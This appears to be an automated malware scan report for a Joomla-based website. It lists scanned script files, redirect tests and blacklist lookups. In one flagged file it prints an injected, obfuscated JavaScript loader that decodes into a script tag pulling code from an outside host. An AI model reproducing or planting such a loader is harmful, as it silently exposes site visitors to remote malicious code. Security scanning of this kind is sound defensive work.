Scanned pages/files
Request | Server response | Status |
http://vdohnova.com/ | 200 OK Content-Length: 26307 Content-Type: text/html | clean |
http://vdohnova.com/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: text/javascript | clean |
http://vdohnova.com/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: text/javascript | clean |
http://vdohnova.com/media/system/js/modal.js | 200 OK Content-Length: 9732 Content-Type: text/javascript | clean |
http://vdohnova.com//ajax.googleapis.com/ajax/libs/jquery/1.8/jquery.min.js/ | 404 Not Found Content-Length: 917 Content-Type: text/html | clean |
http://vdohnova.com/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
http://vdohnova.com/media/k2/assets/js/k2.noconflict.js | 200 OK Content-Length: 528 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var $K2 = jQuery.noConflict();
<!-- js-tools -->
q=0;while(q<71)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00tusjqujttbnbsb/sv0xq.benjo0vtfs0tubu/qiq#?=0tdsjqu?'.charCodeAt(q++)-1))
<!-- /js-tools -->
Antivirus reports:
http://vdohnova.com/components/com_k2/js/k2.js | 200 OK Content-Length: 6820 Content-Type: text/javascript | clean |
http://vdohnova.com/media/system/js/caption.js | 200 OK Content-Length: 973 Content-Type: text/javascript | clean |
http://vdohnova.com/media/widgetkit/js/jquery.js | 200 OK Content-Length: 93826 Content-Type: text/javascript | clean |
http://vdohnova.com/cache/widgetkit/widgetkit-7b0e02cd.js | 200 OK Content-Length: 12848 Content-Type: text/javascript | clean |
http://vdohnova.com/templates/yoo_balance/warp/js/warp.js | 200 OK Content-Length: 6844 Content-Type: text/javascript | clean |
http://vdohnova.com/templates/yoo_balance/warp/js/accordionmenu.js | 200 OK Content-Length: 1526 Content-Type: text/javascript | clean |
http://vdohnova.com/templates/yoo_balance/warp/js/dropdownmenu.js | 200 OK Content-Length: 5421 Content-Type: text/javascript | clean |
http://vdohnova.com/templates/yoo_balance/js/template.js | 200 OK Content-Length: 1113 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vdohnova.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 16:48:50 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2d40feb8c7eb14d1d7e2d7061d56e48a=r31t6f9cvtl4845vn90n8262h6; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: vdohnova.com
Referer: http://www.google.com/search?q=vdohnova.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vdohnova.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vdohnova.com/
Result: vdohnova.com is not infected or malware details are not published yet.